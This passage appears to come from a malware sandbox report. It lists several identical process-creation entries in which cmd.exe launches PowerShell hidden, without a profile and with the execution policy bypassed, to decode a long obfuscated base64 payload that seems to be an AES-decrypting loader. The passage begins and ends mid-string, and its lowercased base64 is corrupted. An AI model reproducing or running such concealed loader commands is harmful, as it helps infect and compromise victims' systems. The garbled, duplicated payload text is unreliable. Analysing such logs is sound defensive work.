bnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2d